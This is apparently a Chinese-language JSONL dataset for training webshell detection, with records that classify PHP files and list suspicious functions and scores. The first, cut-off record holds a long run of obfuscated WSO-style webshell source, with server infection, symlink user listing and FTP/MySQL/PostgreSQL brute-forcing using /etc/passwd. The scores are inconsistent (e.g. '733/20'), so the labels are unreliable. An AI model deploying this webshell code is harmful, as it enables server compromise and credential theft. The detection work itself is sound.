\\x52\\x65q\\x75\\x69\\x72\\x65\\x20\\x4e\\x6fne\\x20\\n\\x20Sa\\x74\\x69\\x73\\x66y\\x20\\x41\\x6ey\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"s\\x6c\\x70e\\x6c\\x63\"]}=fopen(\"s\\x79\\x6d/\\x2ehtac\\x63e\\x73\\x73\",\"w\");fwrite(${${\"GL\\x4f\\x42A\\x4cS\"}[\"\\x73\\x6c\\x70e\\x6cc\"]},${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"fm\\x75\\x6a\\x6f\\x6am\\x6fl\"]});${${\"\\x47LO\\x42\\x41\\x4c\\x53\"}[\"\\x66\\x67\\x65mo\\x75\\x64\\x66p\\x65g\"]}=@file(\"/e\\x74\\x63/\\x6e\\x61\\x6de\\x64\\x2e\\x63\\x6f\\x6e\\x66\");if(!${$czenigt}){die(\"<\\x62\\x3e#\\x45\\x72r\\x6fr\\x2e.. -\\x3e [\\x20/e\\x74\\x63/\\x6e\\x61me\\x64\\x2ec\\x6fnf\\x20]\");}echo\"\\x3ct\\x61ble al\\x69gn=\\x63\\x65\\x6et\\x65\\x72\\x20bord\\x65\\x72=\\x31\\x3e\\n\\x3ctd\\x3e\\x55ser\\x20L\\x69s\\x74 \\x53yml\\x69\\x6ek\";foreach(${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x66g\\x65\\x6d\\x6f\\x75\\x64f\\x70\\x65\\x67\"]} as${${\"\\x47\\x4cO\\x42A\\x4cS\"}[\"yk\\x70\\x6c\\x64\\x76\\x64\\x76\\x73\"]}){$rtspplextfa=\"\\x64\\x30ma\\x69n\";if(eregi(\"\\x7a\\x6f\\x6ee\",${$rtspplextfa})){preg_match_all(\"\\x23zone\\x20\\\"(.*)\\x22#\",${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x79k\\x70\\x6cdv\\x64\\x76\\x73\"]},${${\"\\x47\\x4c\\x4f\\x42AL\\x53\"}[\"\\x79\\x66h\\x7a\\x76\\x77\\x73w\"]});flush();if(strlen(trim(${${\"G\\x4cOBA\\x4c\\x53\"}[\"\\x79\\x66\\x68\\x7a\\x76\\x77\\x73\\x77\"]}[1][0]))>2){${\"G\\x4c\\x4fBAL\\x53\"}[\"\\x6ar\\x79\\x68\\x74\\x6eiqab\\x6a\"]=\"u\\x73\\x65\\x72\";$fcjtfmbcs=\"\\x64\\x6f\\x6da\\x69\\x6e\\x73\";${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"\\x64\\x76\\x65q\\x69\\x73\"]}=posix_getpwuid(@fileowner(\"/\\x65tc/v\\x61\\x6ci\\x61s\\x65\\x73/\".${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"y\\x66\\x68z\\x76w\\x73\\x77\"]}[1][0]));echo\"<\\x74\\x72\\x3e\\x3ctd\\x3e\\x3c/td\\x3e\\x3c\\x74\\x64\\x3e\".${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"j\\x72\\x79ht\\x6e\\x69\\x71\\x61bj\"]}[\"\\x6ea\\x6d\\x65\"].\"\\x3c\\x61 \\x68\\x72\\x65\\x66='s\\x79m/\\x78\\x2e\\x74\\x78t/h\\x6f\\x6de/\".${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x76\\x65\\x71\\x69\\x73\"]}[\"n\\x61\\x6d\\x65\"].\"/\\x70ublic\\x5fh\\x74\\x6dl\\x27>\\x4d\\x69r\\x65\\x6dos\";flush();}}}echo\"\\x46\\x61ilR\\x6fo\\x74-\\x53\\x65\\x63.\\x43\\x6f\\x6d\\x20|\\x20<\\x61 \\nh\\x72\\x65\\x66\\x3d\\x27\\x68t\\x74\\x70://\\x77\\x57\\x77.s\\x45\\x634Ev\\x45\\x72\\x2eCo\\x4d/\\x27>wW\\x77\\x2es\\x45c4EvEr\\x2e\\x43\\x6fM\\x20\\n\\x3c/p\\x3e \\n\";printFooter();}function actionInfect(){printHeader();echo\"\";if($_POST[\"\\x701\"]==\"i\\x6ef\\x65\\x63t\"){$ukelmo=\"t\\x61\\x72\\x67\\x65\\x74\";${${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x63\\x68\\x6fyu\\x76\\x72\\x64\\x66s\"]}=$_SERVER[\"\\x44\\x4f\\x43UME\\x4e\\x54\\x5f\\x52O\\x4fT\"];function ListFiles($dir){${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"\\x70\\x61w\\x6fo\\x76\\x79cg\\x74\\x75\"]=\"\\x64\\x69\\x72\";if(${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x78\\x6e\\x68\\x6e\\x76fo\\x66\\x62r\"]}=opendir(${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x70\\x61\\x77\\x6f\\x6f\\x76ycg\\x74\\x75\"]})){$odsjqd=\"\\x66\\x69\\x6c\\x65s\";$ewjcsclizqmf=\"d\\x68\";${$odsjqd}=Array();${${\"\\x47\\x4c\\x4fB\\x41L\\x53\"}[\"\\x63\\x75\\x64a\\x76u\"]}=Array();while(${${\"\\x47LOB\\x41L\\x53\"}[\"\\x78\\x64\\x6e\\x74\\x6b\\x6c\\x6c\\x70\\x6ai\"]}=readdir(${${\"GLOBALS\"}[\"\\x78n\\x68n\\x76f\\x6ff\\x62\\x72\"]})){$onfpvvtx=\"\\x66i\\x6c\\x65\";if(${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"\\x78\\x64n\\x74k\\x6c\\x6c\\x70\\x6ai\"]}!=\".\"&&${$onfpvvtx}!=\"\\x2e.\"){$akvroey=\"\\x66i\\x6ce\";${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"dn\\x6b\\x73\\x65mr\\x74\\x65\"]=\"\\x64i\\x72\";if(is_dir(${${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x64\\x6e\\x6bs\\x65mr\\x74\\x65\"]}.\"/\".${$akvroey})){$bhiirbjs=\"\\x69\\x6e\\x6e\\x65r\\x5f\\x66\\x69\\x6c\\x65s\";$mgxxfxobjoc=\"fi\\x6c\\x65\";$yjbhqjq=\"\\x66\\x69\\x6ce\\x73\";${$bhiirbjs}=ListFiles(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"u\\x6fh\\x79l\\x6b\\x77\\x67\"]}.\"/\".${$mgxxfxobjoc});if(is_array(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"c\\x75d\\x61\\x76\\x75\"]}))${$yjbhqjq}=array_merge(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x75\\x6d\\x77gvd\\x67\\x65\"]},${${\"\\x47\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x63\\x75\\x64\\x61vu\"]});}else{$exwrpjuo=\"\\x64\\x69\\x72\";$dnuxvemfe=\"\\x66i\\x6ce\";array_push(${${\"G\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x75m\\x77\\x67v\\x64\\x67e\"]},${$exwrpjuo}.\"/\".${$dnuxvemfe});}}}closedir(${$ewjcsclizqmf});return${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"um\\x77\\x67\\x76d\\x67e\"]};}}foreach(ListFiles(${$ukelmo})as${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"\\x6e\\x62\\x73k\\x63\\x71\\x68\\x68\"]}=>${${\"G\\x4cOBA\\x4c\\x53\"}[\"x\\x64nt\\x6b\\x6cl\\x70\\x6a\\x69\"]}){$jmpwduwn=\"nFil\\x65\";$skqdmqjx=\"\\x6e\\x46\\x69\\x6c\\x65\";${$skqdmqjx}=substr(${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x78\\x64ntk\\x6c\\x6c\\x70\\x6ai\"]},-4,4);if(${$jmpwduwn}==\"\\x2e\\x70h\\x70\"){$oidtklxjj=\"\\x66\\x69\\x6c\\x65\";${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"\\x62\\x70\\x78\\x63\\x63\\x6f\\x64\\x64\\x65\"]=\"\\x66i\\x6ce\";if((${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x62\\x70\\x78\\x63c\\x6f\\x64\\x64\\x65\"]}<>$_SERVER[\"\\x44\\x4f\\x43U\\x4dENT_R\\x4fOT\"].$_SERVER[\"\\x50\\x48P_S\\x45\\x4cF\"])&&(is_writeable(${$oidtklxjj}))){$ojkuqaweu=\"i\";echo\"$file\\x3cbr\\x3e\";${$ojkuqaweu}++;}}}echo\"$i\\x3c/f\\x6f\\x6e\\x74>\";}else{echo\"\\x3cfor\\x6d\\x20met\\x68\\x6fd=\\x70\\x6f\\x73t>\";echo\"Rea\\x6cly w\\x61n\\x74 t\\x6f infect \\x74\\x68\\x65\\x20\\x73e\\x72\\x76\\x65r?\\x26\\x6e\\x62s\\x70\\x3b\\n\";}printFooter();}function actionBruteforce(){printHeader();if(isset($_POST[\"\\x70rot\\x6f\"])){$xmhhpmytla=\"\\x61\\x74\\x74em\\x70\\x74s\";echo\"\\x3c\\x68\\x31\\x3eRe\\x73\\x75lt\\x73<\\x64\\x69\\x76 cl\\x61s\\x73\\x3d\\x63\\x6fnt\\x65n\\x74>\\x3cs\\x70\\x61n\\x3e\\x54y\\x70\\x65: \".htmlspecialchars($_POST[\"\\x70\\x72\\x6f\\x74\\x6f\"]).\" <\\x73\\x70\\x61n>S\\x65\\x72\\x76e\\x72:\\x3c/s\\x70\\x61n\\x3e \".htmlspecialchars($_POST[\"server\"]).\"<\\x62\\x72\\x3e\";${\"G\\x4c\\x4fBA\\x4c\\x53\"}[\"o\\x63dkn\\x65\\x6cy\\x69\"]=\"s\\x75\\x63\\x63\\x65\\x73s\";${\"\\x47\\x4c\\x4f\\x42\\x41\\x4cS\"}[\"\\x66fmp\\x7aq\\x78\\x70n\"]=\"s\\x65r\\x76\\x65r\";if($_POST[\"\\x70roto\"]==\"f\\x74\\x70\"){function bruteForce($ip,$port,$login,$pass){${\"G\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x67c\\x75m\\x68y\\x66\\x6d\\x74\\x65h\"]=\"por\\x74\";$wjulivyfhddl=\"f\\x70\";${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"c\\x77\\x6f\\x73\\x6b\\x69\\x62\"]=\"\\x72\\x65\\x73\";${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6a\\x65\\x6f\\x62\\x66\\x70\\x67\\x6ek\\x71\\x70\\x6b\"]}=@ftp_connect(${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"r\\x6d\\x78oj\\x76\"]},${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"g\\x63u\\x6dh\\x79\\x66\\x6dt\\x65\\x68\"]}?${${\"G\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x6cc\\x71\\x72\\x77\\x63\\x66\"]}:21);if(!${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"j\\x65obfp\\x67\\x6e\\x6bq\\x70k\"]})return false;${${\"\\x47\\x4c\\x4fB\\x41\\x4cS\"}[\"cwo\\x73k\\x69\\x62\"]}=@ftp_login(${${\"\\x47L\\x4f\\x42\\x41LS\"}[\"\\x6aeo\\x62\\x66\\x70\\x67\\x6ek\\x71\\x70k\"]},${${\"\\x47\\x4c\\x4fBAL\\x53\"}[\"d\\x79\\x61w\\x76\\x63\\x67\"]},${${\"G\\x4cO\\x42\\x41L\\x53\"}[\"\\x64or\\x6d\\x6f\\x7au\"]});@ftp_close(${$wjulivyfhddl});return${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"l\\x6d\\x6e\\x79e\\x7a\"]};}}elseif($_POST[\"\\x70r\\x6f\\x74\\x6f\"]==\"m\\x79\\x73q\\x6c\"){function bruteForce($ip,$port,$login,$pass){${\"G\\x4cOBAL\\x53\"}[\"\\x71y\\x75\\x65\\x74\\x68\\x74\\x64\\x64w\\x79\"]=\"\\x69\\x70\";$hprhczelywn=\"p\\x6f\\x72t\";$gpkgzmtadr=\"r\\x65\\x73\";${$gpkgzmtadr}=@mysql_connect(${${\"\\x47LO\\x42ALS\"}[\"q\\x79u\\x65\\x74\\x68t\\x64\\x64w\\x79\"]}.\":\".${$hprhczelywn}?${${\"G\\x4c\\x4f\\x42\\x41L\\x53\"}[\"\\x6c\\x63\\x71\\x72\\x77\\x63\\x66\"]}:3306,${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x64\\x79a\\x77v\\x63g\"]},${${\"\\x47\\x4cO\\x42\\x41L\\x53\"}[\"d\\x6f\\x72\\x6d\\x6f\\x7a\\x75\"]});@mysql_close(${${\"\\x47L\\x4fBAL\\x53\"}[\"l\\x6d\\x6ey\\x65z\"]});return${${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"\\x6c\\x6dn\\x79\\x65\\x7a\"]};}}elseif($_POST[\"p\\x72ot\\x6f\"]==\"\\x70\\x67\\x73\\x71\\x6c\"){function bruteForce($ip,$port,$login,$pass){${\"\\x47\\x4c\\x4f\\x42\\x41LS\"}[\"\\x74u\\x74\\x72\\x77\\x67k\\x6f\\x78\"]=\"r\\x65s\";$wqwkkylcwxi=\"\\x73t\\x72\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"\\x64\\x64p\\x6a\\x72\\x76\"]=\"\\x6c\\x6f\\x67i\\x6e\";${\"\\x47\\x4cO\\x42A\\x4c\\x53\"}[\"\\x6c\\x67v\\x6d\\x6e\\x62\\x6c\\x78b\\x6b\\x6fj\"]=\"\\x69\\x70\";$xhnquwkvu=\"\\x73\\x65\\x72\\x76e\\x72\";${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x71\\x79\\x79\\x6d\\x70\\x66\\x78\\x66d\\x77\\x6fs\"]=\"\\x70\\x6f\\x72\\x74\";$nwioycyjrrto=\"p\\x61\\x73\\x73\";${$wqwkkylcwxi}=\"\\x68\\x6f\\x73\\x74='\".${${\"GL\\x4f\\x42\\x41\\x4cS\"}[\"\\x6c\\x67v\\x6d\\x6e\\x62l\\x78b\\x6b\\x6f\\x6a\"]}.\"'\\x20p\\x6f\\x72\\x74=\\x27\".${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"q\\x79\\x79\\x6d\\x70\\x66\\x78\\x66\\x64\\x77\\x6f\\x73\"]}.\"'\\x20\\x75\\x73e\\x72='\".${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"d\\x79\\x61\\x77\\x76c\\x67\"]}.\"'\\x20\\x70\\x61\\x73sw\\x6f\\x72d\\x3d\\x27\".${$nwioycyjrrto}.\"\\x27\\x20\\x64b\\x6eame\\x3d''\";${${\"\\x47L\\x4f\\x42\\x41\\x4cS\"}[\"\\x6c\\x6d\\x6ey\\x65\\x7a\"]}=@pg_connect(${$xhnquwkvu}[0].\":\".${${\"GL\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x71\\x73t\\x78\\x68\\x75\\x64\\x6d\"]}[1]?${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x71s\\x74\\x78\\x68\\x75\\x64m\"]}[1]:5432,${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x64d\\x70j\\x72\\x76\"]},${${\"GLO\\x42\\x41\\x4c\\x53\"}[\"d\\x6frmo\\x7au\"]});@pg_close(${${\"\\x47\\x4cO\\x42\\x41LS\"}[\"tutrwg\\x6bo\\x78\"]});return${${\"G\\x4c\\x4fB\\x41\\x4cS\"}[\"l\\x6d\\x6eye\\x7a\"]};}}${${\"\\x47LOBA\\x4cS\"}[\"\\x6f\\x63\\x64k\\x6ee\\x6c\\x79\\x69\"]}=0;${$xmhhpmytla}=0;${${\"\\x47L\\x4f\\x42A\\x4cS\"}[\"\\x66\\x66m\\x70z\\x71\\x78\\x70\\x6e\"]}=explode(\":\",$_POST[\"\\x73\\x65\\x72v\\x65\\x72\"]);if($_POST[\"t\\x79p\\x65\"]==1){$cectqy=\"\\x74emp\";${$cectqy}=@file(\"/\\x65t\\x63/p\\x61\\x73s\\x77d\");if(is_array(${${\"\\x47LOBA\\x4c\\x53\"}[\"\\x70\\x72kk\\x77n\\x6a\\x65\"]})){foreach(${${\"\\x47L\\x4f\\x42\\x41L\\x53\"}[\"pr\\x6bk\\x77n\\x6a\\x65\"]} as${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"x\\x70v\\x69tc\\x78\"]}){${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"\\x70\\x72\\x78y\\x74d\\x65\"]=\"\\x6ci\\x6e\\x65\";$kqozytn=\"\\x73\\x65\\x72\\x76\\x65\\x72\";$rvizdtbzpq=\"\\x6c\\x69n\\x65\";${${\"\\x47LO\\x42\\x41L\\x53\"}[\"x\\x70v\\x69\\x74\\x63\\x78\"]}=explode(\":\",${${\"\\x47\\x4cO\\x42\\x41\\x4c\\x53\"}[\"\\x70rxyt\\x64\\x65\"]});++${${\"\\x47L\\x4f\\x42\\x41\\x4c\\x53\"}[\"u\\x64l\\x64\\x75\\x74\\x73\\x75\"]};if(bruteForce(@${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x71s\\x74\\x78\\x68ud\\x6d\"]}[0],@${$kqozytn}[1],${${\"\\x47\\x4c\\x4f\\x42A\\x4cS\"}[\"\\x78\\x70v\\x69\\x74\\x63x\"]}[0],${$rvizdtbzpq}[0])){${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"vc\\x65\\x77bwqp\\x6e\"]=\"\\x6c\\x69\\x6e\\x65\";${\"\\x47\\x4cOBALS\"}[\"b\\x6a\\x67\\x76\\x75\\x75\\x6f\"]=\"\\x73\\x75cc\\x65s\\x73\";${\"\\x47\\x4c\\x4f\\x42ALS\"}[\"i\\x70mo\\x76g\\x70\\x67\"]=\"\\x6cin\\x65\";${${\"\\x47\\x4cO\\x42AL\\x53\"}[\"\\x62\\x6ag\\x76uuo\"]}++;echo\"\".htmlspecialchars(${${\"G\\x4c\\x4fBA\\x4cS\"}[\"i\\x70mo\\x76g\\x70\\x67\"]}[0]).\":\".htmlspecialchars(${${\"\\x47L\\x4fBA\\x4c\\x53\"}[\"\\x76c\\x65w\\x62\\x77qpn\"]}[0]).\"\";}if(@$_POST[\"r\\x65v\\x65r\\x73e\"]){$nhpweqpdqte=\"\\x69\";${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"h\\x62\\x75jv\\x6f\\x63\"]=\"\\x69\";$emcarib=\"li\\x6ee\";${${\"\\x47LOB\\x41\\x4c\\x53\"}[\"\\x62n\\x66i\\x74j\"]}=\"\";for(${$nhpweqpdqte}=strlen(${${\"\\x47\\x4c\\x4fBA\\x4c\\x53\"}[\"\\x78p\\x76\\x69\\x74c\\x78\"]}[0])-1;${${\"\\x47\\x4c\\x4f\\x42A\\x4c\\x53\"}[\"u\\x62\\x6a\\x67mi\\x79\\x76\\x73\\x63\\x62\"]}>=0;--${${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"h\\x62\\x75\\x6a\\x76\\x6fc\"]})${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x62n\\x66\\x69\\x74\\x6a\"]}.=${$emcarib}[0][${${\"GL\\x4f\\x42A\\x4cS\"}[\"ubjg\\x6d\\x69\\x79\\x76s\\x63\\x62\"]}];++${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x75\\x64l\\x64ut\\x73u\"]};if(bruteForce(@${${\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"}[\"qs\\x74x\\x68u\\x64m\"]}[0],@${${\"\\x47L\\x4fB\\x41\\x4c\\x53\"}[\"\\x71\\x73t\\x78\\x68u\\x64\\x6d\"]}[1],${${\"G\\x4c\\x4f\\x42ALS\"}[\"\\x78\\x70\\x76\\x69t\\x63x\"]}[0],${${\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"}[\"\\x62nf\\x69\\x74j\"]})){${${\"G\\x4cO\\x42\\x41\\x4cS\"}[\"\\x6an\\x68\\x70\\x6d\\x70i\\x6d\\x63\\x61\"]}++;echo\"\\x3cb\\x3e\".htmlspecialchars(${${\"\\x47\\x4cOBA\\x4c\\x53\"}[\"\\x78\\x70\\x76\\x69\\x74\\x63\\x78\"]}[0]).\"S\\x75c\\x63\\x65\\x73s:\\x20$success\\x3c/div>
\";}echo\"\\x3ch\\x31\\x3e\\x46\\x54P\\x20\\x62r\\x75t\\x65\\x66o\\x72c\\x65\\x3cdiv\\x20cl\\x61s\\x73=\\x63\\x6fn\\x74\\x65nt\\x3e<\\x73\\x70\\x61n\\x3eT\\x79p\\x65\\x3co\\x70\\x74io\\x6e\\x20\\x76\\x61l\\x75\\x65\\x3dmy\\x73ql\\x3eM\\x79\\x53ql<\\x6fpt\\x69\\x6f\\x6e\\x20\\x76al\\x75e\\x3d\\x70\\x67\\x73q\\x6c\\x3e\\x50\\x6f\\x73\\x74g\\x72e\\x53q\\x6c\\x3c/\\x74r\\x3e\\x3ct\\x72\\x3e<\\x74\\x64>\".\"\\x3c/t\\x64>\".\"\\x3c\\x74d\\x3e\\x3c\\x69\\x6epu\\x74\\x20t\\x79\\x70\\x65\\x3dt\\x65\\x78\\x74\\x20n\\x61\\x6d\\x65\\x3d\\x73\\x65\\x72\\x76e\\x72\\x20\\x76a\\x6c\\x75\\x65\\x3d\\\"1\\x32\\x37\\x2e0\\x2e0\\x2e1\\\"\\x3e\".\"\\x3c\\x74r\\x3e\\x3c\\x74d\\x3e\\x3c\\x73\\x70\\x61\\x6e\\x3e\\x42\\x72\\x75te \\x74\\x79pe\".\"\\x3c\\x74d>\\x3cl\\x61\\x62\\x65l><\\x69\\x6ep\\x75t ty\\x70\\x65=\\x72\\x61dio n\\x61m\\x65\\x3dt\\x79\\x70e va\\x6c\\x75e\\x3d\\x221\\x22 ch\\x65\\x63k\\x65\\x64>\\x20/e, file_get_contents(, fwrite(, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 733/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/wso.php", "malicious_score": 733, "md5_hash": "1be18354cc48be5faafb724b1d2e8ec0"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"DxShell.php\", \"文件类型\": \"php\", \"文件大小\": \"111446 bytes\", \"行数\": 2109}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 1542/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/DxShell.php", "malicious_score": 1542, "md5_hash": "52e74a5ed84789dbff01ca9e7c3c7b38"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"102c9ca0f8403f3b71e62c33b1a5b6c3.php\", \"文件类型\": \"php\", \"文件大小\": \"53064 bytes\", \"行数\": 23}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/102c9ca0f8403f3b71e62c33b1a5b6c3.php", "malicious_score": 13, "md5_hash": "574f3303e131242568b0caf3de42f325"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pws.php\", \"文件类型\": \"php\", \"文件大小\": \"869 bytes\", \"行数\": 35}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, $_POST[ 具备文件操作能力: copy\\s*\\( 恶意度评分: 16/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/pws.php", "malicious_score": 16, "md5_hash": "ecdc6c20f62f99fa265ec9257b7bf2ce"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ab702db90fcd81ba1f1d6dff6f4d7258.php\", \"文件类型\": \"php\", \"文件大小\": \"2244 bytes\", \"行数\": 94}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/ab702db90fcd81ba1f1d6dff6f4d7258.php", "malicious_score": 9, "md5_hash": "5bd07ccb1111950a5b47327946bfa194"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP.php\", \"文件类型\": \"php\", \"文件大小\": \"37240 bytes\", \"行数\": 1010}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/PHP.php", "malicious_score": 17, "md5_hash": "a2f8fa4cce578fc9c06f8e674b9e63fd"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"499db4d70955f7d40cf5cbaf2ecaf7a2.php\", \"文件类型\": \"php\", \"文件大小\": \"170854 bytes\", \"行数\": 2459}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, gzinflate(, file_get_contents(, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, gzinflate, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 229/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/499db4d70955f7d40cf5cbaf2ecaf7a2.php", "malicious_score": 229, "md5_hash": "bfbcf7566485a1e1d3627b093096aed2"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"63cea7f28fadfdc9325c3f45d0c9c1b0.php\", \"文件类型\": \"php\", \"文件大小\": \"4207 bytes\", \"行数\": 84}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 具备文件操作能力: fopen\\s*\\( 恶意度评分: 25/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/63cea7f28fadfdc9325c3f45d0c9c1b0.php", "malicious_score": 25, "md5_hash": "b0e842bdf83396c3ef8c71ff94e64167"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"69891a9d8e829e84e9ee5e7b3867d9a1.php\", \"文件类型\": \"php\", \"文件大小\": \"20551 bytes\", \"行数\": 659}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, $_POST[, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 104/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/69891a9d8e829e84e9ee5e7b3867d9a1.php", "malicious_score": 104, "md5_hash": "6d3b55f58daa66179f1cdd67cd791b6d"}}
{"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"6b8df20f75f6e8c8cd434501cb71c090.php\", \"文件类型\": \"php\", \"文件大小\": \"72979 bytes\", \"行数\": 1417}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 731/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/PHP/dama/6b8df20f75f6e8c8cd434501cb71c090.php", "malicious_score": 731, "md5_hash": "c6ae7930aa5502045906e46838148092"}}
